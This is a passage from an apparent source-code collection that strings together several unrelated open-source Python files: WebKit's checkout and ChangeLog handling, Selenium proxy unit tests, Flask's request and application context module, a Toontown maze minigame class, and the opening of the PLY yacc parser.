CommitInfo from webkitpy.common.checkout.scm import CommitMessage from webkitpy.common.memoized import memoized from webkitpy.common.system.executive import ScriptError # This class represents the WebKit-specific parts of the checkout (like ChangeLogs). 
# FIXME: Move a bunch of ChangeLog-specific processing from SCM to this object. # NOTE: All paths returned from this class should be absolute. class Checkout(object): def __init__(self, scm, executive=None, filesystem=None): self._scm = scm # FIXME: We shouldn't be grabbing at private members on scm. self._executive = executive or self._scm._executive self._filesystem = filesystem or self._scm._filesystem def is_path_to_changelog(self, path): return self._filesystem.basename(path) == "ChangeLog" def _latest_entry_for_changelog_at_revision(self, changelog_path, revision): changelog_contents = self._scm.contents_at_revision(changelog_path, revision) # contents_at_revision returns a byte array (str()), but we know # that ChangeLog files are utf-8. parse_latest_entry_from_file # expects a file-like object which vends unicode(), so we decode here. # Old revisions of Sources/WebKit/wx/ChangeLog have some invalid utf8 characters. changelog_file = StringIO.StringIO(changelog_contents.decode("utf-8", "ignore")) return ChangeLog.parse_latest_entry_from_file(changelog_file) def changelog_entries_for_revision(self, revision, changed_files=None): if not changed_files: changed_files = self._scm.changed_files_for_revision(revision) # FIXME: This gets confused if ChangeLog files are moved, as # deletes are still "changed files" per changed_files_for_revision. # FIXME: For now we hack around this by caching any exceptions # which result from having deleted files included the changed_files list. 
changelog_entries = [] for path in changed_files: if not self.is_path_to_changelog(path): continue try: changelog_entries.append(self._latest_entry_for_changelog_at_revision(path, revision)) except ScriptError: pass return changelog_entries def _changelog_data_for_revision(self, revision): changed_files = self._scm.changed_files_for_revision(revision) changelog_entries = self.changelog_entries_for_revision(revision, changed_files=changed_files) # Assume for now that the first entry has everything we need: # FIXME: This will throw an exception if there were no ChangeLogs. if not len(changelog_entries): return None changelog_entry = changelog_entries[0] return { "bug_id": parse_bug_id_from_changelog(changelog_entry.contents()), "author_name": changelog_entry.author_name(), "author_email": changelog_entry.author_email(), "author": changelog_entry.author(), "reviewer_text": changelog_entry.reviewer_text(), "reviewer": changelog_entry.reviewer(), "contents": changelog_entry.contents(), "changed_files": changed_files, } @memoized def commit_info_for_revision(self, revision): committer_email = self._scm.committer_email_for_revision(revision) changelog_data = self._changelog_data_for_revision(revision) if not changelog_data: return None return CommitInfo(revision, committer_email, changelog_data) def bug_id_for_revision(self, revision): return self.commit_info_for_revision(revision).bug_id() def _modified_files_matching_predicate(self, git_commit, predicate, changed_files=None): # SCM returns paths relative to scm.checkout_root # Callers (especially those using the ChangeLog class) may # expect absolute paths, so this method returns absolute paths. 
if not changed_files: changed_files = self._scm.changed_files(git_commit) return filter(predicate, map(self._scm.absolute_path, changed_files)) def modified_changelogs(self, git_commit, changed_files=None): return self._modified_files_matching_predicate(git_commit, self.is_path_to_changelog, changed_files=changed_files) def modified_non_changelogs(self, git_commit, changed_files=None): return self._modified_files_matching_predicate(git_commit, lambda path: not self.is_path_to_changelog(path), changed_files=changed_files) def commit_message_for_this_commit(self, git_commit, changed_files=None, return_stderr=False): changelog_paths = self.modified_changelogs(git_commit, changed_files) if not len(changelog_paths): raise ScriptError(message="Found no modified ChangeLogs, cannot create a commit message.\n" "All changes require a ChangeLog. See:\n %s" % urls.contribution_guidelines) message_text = self._scm.run([self._scm.script_path('commit-log-editor'), '--print-log'] + changelog_paths, return_stderr=return_stderr) return CommitMessage(message_text.splitlines()) def recent_commit_infos_for_files(self, paths): revisions = set(sum(map(self._scm.revisions_changing_file, paths), [])) return set(map(self.commit_info_for_revision, revisions)) def suggested_reviewers(self, git_commit, changed_files=None): changed_files = self.modified_non_changelogs(git_commit, changed_files) commit_infos = sorted(self.recent_commit_infos_for_files(changed_files), key=lambda info: info.revision(), reverse=True) reviewers = filter(lambda person: person and person.can_review, sum(map(lambda info: [info.reviewer(), info.author()], commit_infos), [])) unique_reviewers = reduce(lambda suggestions, reviewer: suggestions + [reviewer if reviewer not in suggestions else None], reviewers, []) return filter(lambda reviewer: reviewer, unique_reviewers) def bug_id_for_this_commit(self, git_commit, changed_files=None): try: return parse_bug_id_from_changelog(self.commit_message_for_this_commit(git_commit, 
changed_files).message()) except ScriptError, e: pass # We might not have ChangeLogs. def apply_patch(self, patch): # It's possible that the patch was not made from the root directory. # We should detect and handle that case. # FIXME: Move _scm.script_path here once we get rid of all the dependencies. # --force (continue after errors) is the common case, so we always use it. args = [self._scm.script_path('svn-apply'), "--force"] if patch.reviewer(): args += ['--reviewer', patch.reviewer().full_name] self._executive.run_command(args, input=patch.contents(), cwd=self._scm.checkout_root) def apply_reverse_diff(self, revision): self._scm.apply_reverse_diff(revision) # We revert the ChangeLogs because removing lines from a ChangeLog # doesn't make sense. ChangeLogs are append only. changelog_paths = self.modified_changelogs(git_commit=None) if len(changelog_paths): self._scm.revert_files(changelog_paths) conflicts = self._scm.conflicted_files() if len(conflicts): raise ScriptError(message="Failed to apply reverse diff for revision %s because of the following conflicts:\n%s" % (revision, "\n".join(conflicts))) def apply_reverse_diffs(self, revision_list): for revision in sorted(revision_list, reverse=True): self.apply_reverse_diff(revision)
bsd-3-clause
bartolkaruza/selenium
py/test/selenium/webdriver/common/proxy_tests.py
65
5759
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import unittest from selenium.webdriver.common.proxy import Proxy, ProxyType class ProxyTests(unittest.TestCase): MANUAL_PROXY = { 'httpProxy': 'some.url:1234', 'ftpProxy': 'ftp.proxy', 'noProxy': 'localhost, foo.localhost', 'sslProxy': 'ssl.proxy:1234', 'socksProxy': 'socks.proxy:65555', 'socksUsername': 'test', 'socksPassword': 'test', } PAC_PROXY = { 'proxyAutoconfigUrl': 'http://pac.url:1234', } AUTODETECT_PROXY = { 'autodetect': True, } def testCanAddManualProxyToDesiredCapabilities(self): proxy = Proxy() proxy.http_proxy = self.MANUAL_PROXY['httpProxy'] proxy.ftp_proxy = self.MANUAL_PROXY['ftpProxy'] proxy.no_proxy = self.MANUAL_PROXY['noProxy'] proxy.sslProxy = self.MANUAL_PROXY['sslProxy'] proxy.socksProxy = self.MANUAL_PROXY['socksProxy'] proxy.socksUsername = self.MANUAL_PROXY['socksUsername'] proxy.socksPassword = self.MANUAL_PROXY['socksPassword'] desired_capabilities = {} proxy.add_to_capabilities(desired_capabilities) proxy_capabilities = self.MANUAL_PROXY.copy() proxy_capabilities['proxyType'] = 'MANUAL' expected_capabilities = {'proxy': proxy_capabilities} self.assertEqual(expected_capabilities, desired_capabilities) def testCanAddAutodetectProxyToDesiredCapabilities(self): proxy = 
Proxy() proxy.auto_detect = self.AUTODETECT_PROXY['autodetect'] desired_capabilities = {} proxy.add_to_capabilities(desired_capabilities) proxy_capabilities = self.AUTODETECT_PROXY.copy() proxy_capabilities['proxyType'] = 'AUTODETECT' expected_capabilities = {'proxy': proxy_capabilities} self.assertEqual(expected_capabilities, desired_capabilities) def testCanAddPACProxyToDesiredCapabilities(self): proxy = Proxy() proxy.proxy_autoconfig_url = self.PAC_PROXY['proxyAutoconfigUrl'] desired_capabilities = {} proxy.add_to_capabilities(desired_capabilities) proxy_capabilities = self.PAC_PROXY.copy() proxy_capabilities['proxyType'] = 'PAC' expected_capabilities = {'proxy': proxy_capabilities} self.assertEqual(expected_capabilities, desired_capabilities) def testCanNotChangeInitializedProxyType(self): proxy = Proxy(raw={'proxyType': 'direct'}) try: proxy.proxy_type = ProxyType.SYSTEM raise Exception("Change of already initialized proxy type should raise exception") except Exception as e: pass proxy = Proxy(raw={'proxyType': ProxyType.DIRECT}) try: proxy.proxy_type = ProxyType.SYSTEM raise Exception("Change of already initialized proxy type should raise exception") except Exception as e: pass def testCanInitManualProxy(self): proxy = Proxy(raw=self.MANUAL_PROXY) self.assertEqual(ProxyType.MANUAL, proxy.proxy_type) self.assertEqual(self.MANUAL_PROXY['httpProxy'], proxy.http_proxy) self.assertEqual(self.MANUAL_PROXY['ftpProxy'], proxy.ftp_proxy) self.assertEqual(self.MANUAL_PROXY['noProxy'], proxy.no_proxy) self.assertEqual(self.MANUAL_PROXY['sslProxy'], proxy.sslProxy) self.assertEqual(self.MANUAL_PROXY['socksProxy'], proxy.socksProxy) self.assertEqual(self.MANUAL_PROXY['socksUsername'], proxy.socksUsername) self.assertEqual(self.MANUAL_PROXY['socksPassword'], proxy.socksPassword) def testCanAddAutodetectProxyToDesiredCapabilities(self): proxy = Proxy(raw=self.AUTODETECT_PROXY) self.assertEqual(ProxyType.AUTODETECT, proxy.proxy_type) 
self.assertEqual(self.AUTODETECT_PROXY['autodetect'], proxy.auto_detect) def testCanAddPACProxyToDesiredCapabilities(self): proxy = Proxy(raw=self.PAC_PROXY) self.assertEqual(ProxyType.PAC, proxy.proxy_type) self.assertEqual(self.PAC_PROXY['proxyAutoconfigUrl'], proxy.proxy_autoconfig_url) def testCanInitEmptyProxy(self): proxy = Proxy() self.assertEqual(ProxyType.UNSPECIFIED, proxy.proxy_type) self.assertEqual('', proxy.http_proxy) self.assertEqual('', proxy.ftp_proxy) self.assertEqual('', proxy.no_proxy) self.assertEqual('', proxy.sslProxy) self.assertEqual('', proxy.socksProxy) self.assertEqual('', proxy.socksUsername) self.assertEqual('', proxy.socksPassword) self.assertEqual(False, proxy.auto_detect) self.assertEqual('', proxy.proxy_autoconfig_url) desired_capabilities = {} proxy.add_to_capabilities(desired_capabilities) proxy_capabilities = {} proxy_capabilities['proxyType'] = 'UNSPECIFIED' expected_capabilities = {'proxy': proxy_capabilities} self.assertEqual(expected_capabilities, desired_capabilities)
apache-2.0
Kamik423/uni_plan
plan/plan/lib64/python3.4/site-packages/flask/ctx.py
170
14739
# -*- coding: utf-8 -*- """ flask.ctx ~~~~~~~~~ Implements the objects required to keep the context. :copyright: (c) 2015 by Armin Ronacher. :license: BSD, see LICENSE for more details. """ import sys from functools import update_wrapper from werkzeug.exceptions import HTTPException from .globals import _request_ctx_stack, _app_ctx_stack from .signals import appcontext_pushed, appcontext_popped from ._compat import BROKEN_PYPY_CTXMGR_EXIT, reraise # a singleton sentinel value for parameter defaults _sentinel = object() class _AppCtxGlobals(object): """A plain object.""" def get(self, name, default=None): return self.__dict__.get(name, default) def pop(self, name, default=_sentinel): if default is _sentinel: return self.__dict__.pop(name) else: return self.__dict__.pop(name, default) def setdefault(self, name, default=None): return self.__dict__.setdefault(name, default) def __contains__(self, item): return item in self.__dict__ def __iter__(self): return iter(self.__dict__) def __repr__(self): top = _app_ctx_stack.top if top is not None: return '<flask.g of %r>' % top.app.name return object.__repr__(self) def after_this_request(f): """Executes a function after this request. This is useful to modify response objects. The function is passed the response object and has to return the same or a new one. Example:: @app.route('/') def index(): @after_this_request def add_header(response): response.headers['X-Foo'] = 'Parachute' return response return 'Hello World!' This is more useful if a function other than the view function wants to modify a response. For instance think of a decorator that wants to add some headers without converting the return value into a response object. .. versionadded:: 0.9 """ _request_ctx_stack.top._after_request_functions.append(f) return f def copy_current_request_context(f): """A helper function that decorates a function to retain the current request context. This is useful when working with greenlets. 
The moment the function is decorated a copy of the request context is created and then pushed when the function is called. Example:: import gevent from flask import copy_current_request_context @app.route('/') def index(): @copy_current_request_context def do_some_work(): # do some work here, it can access flask.request like you # would otherwise in the view function. ... gevent.spawn(do_some_work) return 'Regular response' .. versionadded:: 0.10 """ top = _request_ctx_stack.top if top is None: raise RuntimeError('This decorator can only be used at local scopes ' 'when a request context is on the stack. For instance within ' 'view functions.') reqctx = top.copy() def wrapper(*args, **kwargs): with reqctx: return f(*args, **kwargs) return update_wrapper(wrapper, f) def has_request_context(): """If you have code that wants to test if a request context is there or not this function can be used. For instance, you may want to take advantage of request information if the request object is available, but fail silently if it is unavailable. :: class User(db.Model): def __init__(self, username, remote_addr=None): self.username = username if remote_addr is None and has_request_context(): remote_addr = request.remote_addr self.remote_addr = remote_addr Alternatively you can also just test any of the context bound objects (such as :class:`request` or :class:`g` for truthness):: class User(db.Model): def __init__(self, username, remote_addr=None): self.username = username if remote_addr is None and request: remote_addr = request.remote_addr self.remote_addr = remote_addr .. versionadded:: 0.7 """ return _request_ctx_stack.top is not None def has_app_context(): """Works like :func:`has_request_context` but for the application context. You can also just do a boolean check on the :data:`current_app` object instead. .. 
versionadded:: 0.9 """ return _app_ctx_stack.top is not None class AppContext(object): """The application context binds an application object implicitly to the current thread or greenlet, similar to how the :class:`RequestContext` binds request information. The application context is also implicitly created if a request context is created but the application is not on top of the individual application context. """ def __init__(self, app): self.app = app self.url_adapter = app.create_url_adapter(None) self.g = app.app_ctx_globals_class() # Like request context, app contexts can be pushed multiple times # but there a basic "refcount" is enough to track them. self._refcnt = 0 def push(self): """Binds the app context to the current context.""" self._refcnt += 1 if hasattr(sys, 'exc_clear'): sys.exc_clear() _app_ctx_stack.push(self) appcontext_pushed.send(self.app) def pop(self, exc=_sentinel): """Pops the app context.""" try: self._refcnt -= 1 if self._refcnt <= 0: if exc is _sentinel: exc = sys.exc_info()[1] self.app.do_teardown_appcontext(exc) finally: rv = _app_ctx_stack.pop() assert rv is self, 'Popped wrong app context. (%r instead of %r)' \ % (rv, self) appcontext_popped.send(self.app) def __enter__(self): self.push() return self def __exit__(self, exc_type, exc_value, tb): self.pop(exc_value) if BROKEN_PYPY_CTXMGR_EXIT and exc_type is not None: reraise(exc_type, exc_value, tb) class RequestContext(object): """The request context contains all request relevant information. It is created at the beginning of the request and pushed to the `_request_ctx_stack` and removed at the end of it. It will create the URL adapter and request object for the WSGI environment provided. Do not attempt to use this class directly, instead use :meth:`~flask.Flask.test_request_context` and :meth:`~flask.Flask.request_context` to create this object. 
When the request context is popped, it will evaluate all the functions registered on the application for teardown execution (:meth:`~flask.Flask.teardown_request`). The request context is automatically popped at the end of the request for you. In debug mode the request context is kept around if exceptions happen so that interactive debuggers have a chance to introspect the data. With 0.4 this can also be forced for requests that did not fail and outside of ``DEBUG`` mode. By setting ``'flask._preserve_context'`` to ``True`` on the WSGI environment the context will not pop itself at the end of the request. This is used by the :meth:`~flask.Flask.test_client` for example to implement the deferred cleanup functionality. You might find this helpful for unittests where you need the information from the context local around for a little longer. Make sure to properly :meth:`~werkzeug.LocalStack.pop` the stack yourself in that situation, otherwise your unittests will leak memory. """ def __init__(self, app, environ, request=None): self.app = app if request is None: request = app.request_class(environ) self.request = request self.url_adapter = app.create_url_adapter(self.request) self.flashes = None self.session = None # Request contexts can be pushed multiple times and interleaved with # other request contexts. Now only if the last level is popped we # get rid of them. Additionally if an application context is missing # one is created implicitly so for each level we add this information self._implicit_app_ctx_stack = [] # indicator if the context was preserved. Next time another context # is pushed the preserved context is popped. self.preserved = False # remembers the exception for pop if there is one in case the context # preservation kicks in. self._preserved_exc = None # Functions that should be executed after the request on the response # object. These will be called before the regular "after_request" # functions. 
self._after_request_functions = [] self.match_request() def _get_g(self): return _app_ctx_stack.top.g def _set_g(self, value): _app_ctx_stack.top.g = value g = property(_get_g, _set_g) del _get_g, _set_g def copy(self): """Creates a copy of this request context with the same request object. This can be used to move a request context to a different greenlet. Because the actual request object is the same this cannot be used to move a request context to a different thread unless access to the request object is locked. .. versionadded:: 0.10 """ return self.__class__(self.app, environ=self.request.environ, request=self.request ) def match_request(self): """Can be overridden by a subclass to hook into the matching of the request. """ try: url_rule, self.request.view_args = \ self.url_adapter.match(return_rule=True) self.request.url_rule = url_rule except HTTPException as e: self.request.routing_exception = e def push(self): """Binds the request context to the current context.""" # If an exception occurs in debug mode or if context preservation is # activated under exception situations exactly one context stays # on the stack. The rationale is that you want to access that # information under debug situations. However if someone forgets to # pop that context again we want to make sure that on the next push # it's invalidated, otherwise we run at risk that something leaks # memory. This is usually only a problem in test suite since this # functionality is not active in production environments. top = _request_ctx_stack.top if top is not None and top.preserved: top.pop(top._preserved_exc) # Before we push the request context we have to ensure that there # is an application context. 
app_ctx = _app_ctx_stack.top if app_ctx is None or app_ctx.app != self.app: app_ctx = self.app.app_context() app_ctx.push() self._implicit_app_ctx_stack.append(app_ctx) else: self._implicit_app_ctx_stack.append(None) if hasattr(sys, 'exc_clear'): sys.exc_clear() _request_ctx_stack.push(self) # Open the session at the moment that the request context is # available. This allows a custom open_session method to use the # request context (e.g. code that access database information # stored on `g` instead of the appcontext). self.session = self.app.open_session(self.request) if self.session is None: self.session = self.app.make_null_session() def pop(self, exc=_sentinel): """Pops the request context and unbinds it by doing that. This will also trigger the execution of functions registered by the :meth:`~flask.Flask.teardown_request` decorator. .. versionchanged:: 0.9 Added the `exc` argument. """ app_ctx = self._implicit_app_ctx_stack.pop() try: clear_request = False if not self._implicit_app_ctx_stack: self.preserved = False self._preserved_exc = None if exc is _sentinel: exc = sys.exc_info()[1] self.app.do_teardown_request(exc) # If this interpreter supports clearing the exception information # we do that now. This will only go into effect on Python 2.x, # on 3.x it disappears automatically at the end of the exception # stack. if hasattr(sys, 'exc_clear'): sys.exc_clear() request_close = getattr(self.request, 'close', None) if request_close is not None: request_close() clear_request = True finally: rv = _request_ctx_stack.pop() # get rid of circular dependencies at the end of the request # so that we don't require the GC to be active. if clear_request: rv.request.environ['werkzeug.request'] = None # Get rid of the app as well if necessary. if app_ctx is not None: app_ctx.pop(exc) assert rv is self, 'Popped wrong request context. 
' \ '(%r instead of %r)' % (rv, self) def auto_pop(self, exc): if self.request.environ.get('flask._preserve_context') or \ (exc is not None and self.app.preserve_context_on_exception): self.preserved = True self._preserved_exc = exc else: self.pop(exc) def __enter__(self): self.push() return self def __exit__(self, exc_type, exc_value, tb): # do not pop the request stack if we are in debug mode and an # exception happened. This will allow the debugger to still # access the request object in the interactive shell. Furthermore # the context can be force kept alive for the test client. # See flask.testing for how this works. self.auto_pop(exc_value) if BROKEN_PYPY_CTXMGR_EXIT and exc_type is not None: reraise(exc_type, exc_value, tb) def __repr__(self): return '<%s \'%s\' [%s] of %s>' % ( self.__class__.__name__, self.request.url, self.request.method, self.app.name, )
apache-2.0
ksmit799/Toontown-Source
toontown/minigame/MazeBase.py
2
5514
from pandac.PandaModules import VBase3 from direct.showbase.RandomNumGen import RandomNumGen class MazeBase: def __init__(self, model, mazeData, cellWidth, parent = None): if parent is None: parent = render self.width = mazeData['width'] self.height = mazeData['height'] self.originTX = mazeData['originX'] self.originTY = mazeData['originY'] self.collisionTable = mazeData['collisionTable'] self._initialCellWidth = cellWidth self.cellWidth = self._initialCellWidth self.maze = model self.maze.setPos(0, 0, 0) self.maze.reparentTo(parent) self.maze.stash() return def destroy(self): self.maze.removeNode() del self.maze def onstage(self): self.maze.unstash() def offstage(self): self.maze.stash() def setScale(self, xy = 1, z = 1): self.maze.setScale(VBase3(xy, xy, z)) self.cellWidth = self._initialCellWidth * xy def isWalkable(self, tX, tY, rejectList = ()): if tX <= 0 or tY <= 0 or tX >= self.width or tY >= self.height: return 0 return not self.collisionTable[tY][tX] and not self.collisionTable[tY - 1][tX] and not self.collisionTable[tY][tX - 1] and not self.collisionTable[tY - 1][tX - 1] and (tX, tY) not in rejectList def tile2world(self, TX, TY): return [(TX - self.originTX) * self.cellWidth, (TY - self.originTY) * self.cellWidth] def world2tile(self, x, y): return [int(x / self.cellWidth + self.originTX), int(y / self.cellWidth + self.originTY)] def world2tileClipped(self, x, y): coords = [int(x / self.cellWidth + self.originTX), int(y / self.cellWidth + self.originTY)] coords[0] = min(max(coords[0], 0), self.width - 1) coords[1] = min(max(coords[1], 0), self.height - 1) return coords def doOrthoCollisions(self, oldPos, newPos): offset = newPos - oldPos WALL_OFFSET = 1.0 curX = oldPos[0] curY = oldPos[1] curTX, curTY = self.world2tile(curX, curY) def calcFlushCoord(curTile, newTile, centerTile): EPSILON = 0.01 if newTile > curTile: return (newTile - centerTile) * self.cellWidth - EPSILON - WALL_OFFSET else: return (curTile - centerTile) * self.cellWidth + WALL_OFFSET 
offsetX = offset[0] offsetY = offset[1] WALL_OFFSET_X = WALL_OFFSET if offsetX < 0: WALL_OFFSET_X = -WALL_OFFSET_X WALL_OFFSET_Y = WALL_OFFSET if offsetY < 0: WALL_OFFSET_Y = -WALL_OFFSET_Y newX = curX + offsetX + WALL_OFFSET_X newY = curY newTX, newTY = self.world2tile(newX, newY) if newTX != curTX: if self.collisionTable[newTY][newTX] == 1: offset.setX(calcFlushCoord(curTX, newTX, self.originTX) - curX) newX = curX newY = curY + offsetY + WALL_OFFSET_Y newTX, newTY = self.world2tile(newX, newY) if newTY != curTY: if self.collisionTable[newTY][newTX] == 1: offset.setY(calcFlushCoord(curTY, newTY, self.originTY) - curY) offsetX = offset[0] offsetY = offset[1] newX = curX + offsetX + WALL_OFFSET_X newY = curY + offsetY + WALL_OFFSET_Y newTX, newTY = self.world2tile(newX, newY) if self.collisionTable[newTY][newTX] == 1: cX = calcFlushCoord(curTX, newTX, self.originTX) cY = calcFlushCoord(curTY, newTY, self.originTY) if abs(cX - curX) < abs(cY - curY): offset.setX(cX - curX) else: offset.setY(cY - curY) return oldPos + offset def createRandomSpotsList(self, numSpots, randomNumGen): randomNumGen = RandomNumGen(randomNumGen) width = self.width height = self.height halfWidth = int(width / 2) halfHeight = int(height / 2) quadrants = [(0, 0, halfWidth - 1, halfHeight - 1), (halfWidth, 0, width - 1, halfHeight - 1), (0, halfHeight, halfWidth - 1, height - 1), (halfWidth, halfHeight, width - 1, height - 1)] spotsTaken = [] def getEmptySpotInQuadrant(quadrant): tX = -1 tY = -1 while tX < 0 or not self.isWalkable(tX, tY, spotsTaken): tX = randomNumGen.randint(quadrant[0], quadrant[2]) tY = randomNumGen.randint(quadrant[1], quadrant[3]) spot = (tX, tY) spotsTaken.append(spot) return spot def getSpotList(length): randomNumGen.shuffle(quadrants) l = [] remaining = length for quadrant in quadrants: for u in range(int(length / 4)): l.append(getEmptySpotInQuadrant(quadrant)) remaining -= int(length / 4) for u in range(remaining): quadrant = quadrants[randomNumGen.randint(0, 
len(quadrants) - 1)] l.append(getEmptySpotInQuadrant(quadrant)) return l if type(numSpots) == tuple or type(numSpots) == list: spots = [] for i in numSpots: spots.append(getSpotList(i)) return spots return getSpotList(numSpots)
mit
srm912/servo
components/script/dom/bindings/codegen/ply/ply/yacc.py
319
128492
# ----------------------------------------------------------------------------- # ply: yacc.py # # Copyright (C) 2001-2009, # David M. Beazley (Dabeaz LLC) # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # * Neither the name of the David Beazley or Dabeaz LLC may be used to # endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ----------------------------------------------------------------------------- # # This implements an LR parser that is constructed from grammar rules defined # as Python functions. The grammer is specified by supplying the BNF inside # Python documentation strings. The inspiration for this technique was borrowed # from John Aycock's Spark parsing system. 
PLY might be viewed as cross between # Spark and the GNU bison utility. # # The current implementation is only somewhat object-oriented. The # LR parser itself is defined in terms of an object (which allows multiple # parsers to co-exist). However, most of the variables used during table # construction are defined in terms of global variables. Users shouldn't # notice unless they are trying to define multiple parsers at the same # time using threads (in which case they should have their head examined). # # This implementation supports both SLR and LALR(1) parsing. LALR(1) # support was originally implemented by Elias Ioup (ezioup@alumni.uchicago.edu), # using the algorithm found in Aho, Sethi, and Ullman "Compilers: Principles, # Techniques, and Tools" (The Dragon Book). LALR(1) has since been replaced # by the more efficient DeRemer and Pennello algorithm. # # :::::::: WARNING ::::::: # # Construction of LR parsing tables is fairly complicated and expensive. # To make this module run fast, a *LOT* of work has been put into # optimization---often at the expensive of readability and what might # consider to be good Python "coding style." Modify the code at your # own risk! # ---------------------------------------------------------------------------- __version__ = "3.3" __tabversion__ = "3.2" # Table version #----------------------------------------------------------------------------- # === User configurable parameters === # # Change these to modify the default behavior of yacc (if you wish) #----------------------------------------------------------------------------- yaccdebug = 1 # Debugging mode. 
If set, yacc generates a # a 'parser.out' file in the current directory debug_file = 'parser.out' # Default name of the debugging file tab_module = 'parsetab' # Default name of the table module default_lr = 'LALR' # Default LR table generation method error_count = 3 # Number of symbols that must be shifted to leave recovery mode yaccdevel = 0 # Set to True if developing yacc. This turns off optimized # implementations of certain functions. resultlimit = 40 # Size limit of results when running in debug mode. pickle_protocol = 0 # Protocol to use when writing pickle files import re, types, sys, os.path # Compatibility function for python 2.6/3.0 if sys.version_info[0] < 3: def func_code(f): return f.func_code else: def func_code(f): return f.__code__ # Compatibility try: MAXINT = sys.maxint except AttributeError: MAXINT = sys.maxsize # Python 2.x/3.0 compatibility. def load_ply_lex(): if sys.version_info[0] < 3: import lex else: import ply.lex as lex return lex # This object is a stand-in for a logging object created by the # logging module. PLY will use this by default to create things # such as the parser.out file. If a user wants more detailed # information, they can create their own logging object and pass # it into PLY. class PlyLogger(object): def __init__(self,f): self.f = f def debug(self,msg,*args,**kwargs): self.f.write((msg % args) + "\n") info = debug def warning(self,msg,*args,**kwargs): self.f.write("WARNING: "+ (msg % args) + "\n") def error(self,msg,*args,**kwargs): self.f.write("ERROR: " + (msg % args) + "\n") critical = debug # Null logger is used when no output is generated. Does nothing. class NullLogger(object): def __getattribute__(self,name): return self def __call__(self,*args,**kwargs): return self # Exception raised for yacc-related errors class YaccError(Exception): pass # Format the result message that the parser produces when running in debug mode. 
def format_result(r): repr_str = repr(r) if '\n' in repr_str: repr_str = repr(repr_str) if len(repr_str) > resultlimit: repr_str = repr_str[:resultlimit]+" ..." result = "<%s @ 0x%x> (%s)" % (type(r).__name__,id(r),repr_str) return result # Format stack entries when the parser is running in debug mode def format_stack_entry(r): repr_str = repr(r) if '\n' in repr_str: repr_str = repr(repr_str) if len(repr_str) < 16: return repr_str else: return "<%s @ 0x%x>" % (type(r).__name__,id(r)) #----------------------------------------------------------------------------- # === LR Parsing Engine === # # The following classes are used for the LR parser itself. These are not # used during table construction and are independent of the actual LR # table generation algorithm #----------------------------------------------------------------------------- # This class is used to hold non-terminal grammar symbols during parsing. # It normally has the following attributes set: # .type = Grammar symbol type # .value = Symbol value # .lineno = Starting line number # .endlineno = Ending line number (optional, set automatically) # .lexpos = Starting lex position # .endlexpos = Ending lex position (optional, set automatically) class YaccSymbol: def __str__(self): return self.type def __repr__(self): return str(self) # This class is a wrapper around the objects actually passed to each # grammar rule. Index lookup and assignment actually assign the # .value attribute of the underlying YaccSymbol object. # The lineno() method returns the line number of a given # item (or 0 if not defined). The linespan() method returns # a tuple of (startline,endline) representing the range of lines # for a symbol. The lexspan() method returns a tuple (lexpos,endlexpos) # representing the range of positional information for a symbol. 
class YaccProduction:
    """The `p` object handed to grammar rule functions.

    Wraps a slice of the parser's symbol stack.  Indexing reads/writes the
    .value attribute of the underlying YaccSymbol objects; negative indices
    reach back into the parser stack itself.
    """

    def __init__(self,s,stack=None):
        self.slice = s          # list of YaccSymbols for the current rule
        self.stack = stack      # the parser's full symbol stack
        self.lexer = None       # lexer in use (set by the parse loop)
        self.parser= None       # owning LRParser (set by the parse loop)

    def __getitem__(self,n):
        # p[0] is the result slot, p[1..] are RHS symbols; p[-1] etc. index
        # the parser stack directly (embedded-action support).
        if n >= 0: return self.slice[n].value
        else: return self.stack[n].value

    def __setitem__(self,n,v):
        self.slice[n].value = v

    def __getslice__(self,i,j):
        # Python 2 slice protocol; returns raw values, not symbols
        return [s.value for s in self.slice[i:j]]

    def __len__(self):
        return len(self.slice)

    def lineno(self,n):
        # Starting line of symbol n, or 0 if no position info was recorded
        return getattr(self.slice[n],"lineno",0)

    def set_lineno(self,n,lineno):
        self.slice[n].lineno = lineno

    def linespan(self,n):
        # (startline, endline) for symbol n; endline defaults to startline
        startline = getattr(self.slice[n],"lineno",0)
        endline = getattr(self.slice[n],"endlineno",startline)
        return startline,endline

    def lexpos(self,n):
        # Starting lex position of symbol n, or 0 if unrecorded
        return getattr(self.slice[n],"lexpos",0)

    def lexspan(self,n):
        # (startpos, endpos) for symbol n; endpos defaults to startpos
        startpos = getattr(self.slice[n],"lexpos",0)
        endpos = getattr(self.slice[n],"endlexpos",startpos)
        return startpos,endpos

    def error(self):
        # Called by rule functions to force error recovery; the parse loop
        # catches SyntaxError and enters its recovery path.
        raise SyntaxError


# -----------------------------------------------------------------------------
#                               == LRParser ==
#
# The LR Parsing engine.
# -----------------------------------------------------------------------------

class LRParser:
    """Runtime LR parser driven by precomputed action/goto tables."""

    def __init__(self,lrtab,errorf):
